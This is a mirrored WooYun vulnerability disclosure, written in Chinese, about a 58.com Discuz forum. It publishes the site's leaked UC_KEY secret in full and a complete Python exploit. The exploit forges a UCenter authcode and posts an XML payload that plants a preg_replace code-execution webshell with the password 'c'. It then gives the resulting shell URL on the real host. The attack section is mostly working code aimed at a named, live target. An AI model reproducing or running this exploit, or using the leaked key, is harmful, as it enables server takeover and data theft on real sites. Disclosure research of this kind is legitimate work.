58同城某漏洞成功shell(可控制3个网站)

  • 内容
  • 相关

漏洞详情

披露状态:

 

2016-05-08: 细节已通知厂商并且等待厂商处理中
2016-05-08: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-05-13: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

58同城

详细说明:

在乌云上发现 58 UC_KEY一个

网址 http://bbs.wan.58.com

UC_KEY Uet5r701maVbU04eIb49t2f2y021T2c2K3q9Tdi5Q16f35M3w1XeC7Z9n6X353A8



用这个方法

import sys

import hashlib

import time

import math

import base64

import urllib2

import urllib

import re

import requests

import json

global cookie

global formhash



def microtime(get_as_float = False) :

if get_as_float:

return time.time()

else:

return '%.8f %d' % math.modf(time.time())



def get_authcode(string, key = ''):

ckey_length = 4

key = hashlib.md5(key).hexdigest()

keya = hashlib.md5(key[0:16]).hexdigest()

keyb = hashlib.md5(key[16:32]).hexdigest()

keyc = (hashlib.md5(microtime()).hexdigest())[-ckey_length:]

cryptkey = keya + hashlib.md5(keya+keyc).hexdigest()

key_length = len(cryptkey)

string = '0000000000' + (hashlib.md5(string+keyb)).hexdigest()[0:16]+string

string_length = len(string)

result = ''

box = range(0, 256)

rndkey = dict()

for i in range(0,256):

rndkey[i] = ord(cryptkey[i % key_length])

j=0

for i in range(0,256):

j = (j + box[i] + rndkey[i]) % 256

tmp = box[i]

box[i] = box[j]

box[j] = tmp

a=0

j=0

for i in range(0,string_length):

a = (a + 1) % 256

j = (j + box[a]) % 256

tmp = box[a]

box[a] = box[j]

box[j] = tmp

result += chr(ord(string[i]) ^ (box[(box[a] + box[j]) % 256]))

length=len(result)

return keyc + base64.b64encode(result).replace('=', '')

def get_cookie_formhash(host):

global cookie

global formhash

headers = {'content-type': 'application/json'}

r=requests.get(host,headers=headers)

cookie=r.cookies

hash=re.findall(r'formhash" value="[0-9A-z]{1,10}"',r.text)

_formhash=re.findall(r'"[0-9A-z]{1,10}"',hash[0])

formhash=_formhash[0].replace('"','')

def getshell(host,key):

global cookie

global formhash

header = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64)'}

tm=time.time()+10*3600

agent=hashlib.md5("Mozilla/5.0 (Windows NT 6.1; WOW64)")

string="agent=%s&time=%s&action=updatebadwords" % (agent,tm)

code=urllib.quote(get_authcode(string,key))

get_cookie_formhash(host)

url="%s/api/uc.php?code=%s&formhash=%s" % (host,code,formhash)

payload='''<?xml version="1.0" encoding="ISO-8859-1"?>

<root>

<item id="0">

<item id="findpattern">/admin/e</item>

<item id="replacement">@preg_replace(chr(47).chr(47).chr(101),$_POST[c],chr(098));</item>

</item>

</root>'''

r=requests.post(url,data=payload,cookies=cookie,headers=header)

print url

print r.text

if re.findall('^1',r.text):

print 'success shell is %s/forum.php?mod=ajax&inajax=yes&infloat=register&handlekey=register&ajaxmenu=1&action=checkusername&username=admin password is c' % (host)



if __name__ == '__main__':

commands=sys.argv[1:2]

keys=sys.argv[2:]

args="".join(commands)

argss="".join(keys)

print args,argss

if len(args) < 5:

sys.exit()

else:

getshell(args,argss)





成功 shell

漏洞证明:

http://bbs.wan.58.com/forum.php?mod=ajax&inajax=yes&infloat=register&handlekey=register&ajaxmenu=1&action=checkusername&username=admin c



1.PNG

 

2.PNG

 

修复方案:

20吧

版权声明:转载请注明来源 crocodile@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-05-13 10:10

厂商回复:

 

漏洞Rank:15 (WooYun评价)

最新状态:

暂无


本文标签:

版权声明:若无特殊注明,本文皆为《安三》原创,转载请保留文章出处。『鹦鹉搜索』

百度收录:百度未收录『点击提交』

本文链接:58同城某漏洞成功shell(可控制3个网站) - https://www.15qq.cn/wooyun/483.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注

未显示?请点击刷新

允许邮件通知

评论

1条评论
  1. avatar

    APP定制开发 Lv.4 Chrome 63.0.3239.132 Chrome 63.0.3239.132 Windows 7 x64 Edition Windows 7 x64 Edition 回复

    有用 真有用  谢谢

    广东省深圳市 电信